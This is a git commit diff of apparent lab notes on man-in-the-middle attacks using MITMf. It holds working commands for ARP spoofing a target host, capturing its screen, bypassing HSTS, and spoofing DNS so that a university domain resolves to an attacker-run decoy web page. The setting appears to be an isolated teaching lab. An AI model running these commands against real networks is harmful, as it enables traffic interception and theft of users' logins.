update MITM APR

This commit is contained in:
Frank Xu
2018-12-05 22:03:31 -05:00
parent bac3262959
commit d387bdd4b0
5 changed files with 11 additions and 1 deletions

View File

@@ -5,7 +5,9 @@ apt-get update
apt-get install mitmf -y
//attack
mitmf --arp --spoof --gateway 10.0.2.1 --target 10.0.2.15 -i eth0 -hsts
mitmf --arp --spoof --gateway 10.0.2.1 --targets 10.0.2.15 -i eth0
mitmf --arp --spoof --gateway 10.0.2.1 --targets 10.0.2.15 -i eth0 --screen
//-hsts
//Website
http://www.stealmylogin.com/demo.html

View File

@@ -0,0 +1,8 @@
echo "my person web page" > /var/www/html/index.html
service apache2 start
leafpad /etc/mitmf/mitmf.conf
*.ubalt.edu=10.0.2.10
mitmf --arp --spoof --gateway 10.0.2.1 --target 10.0.2.15 -i eth0 --dns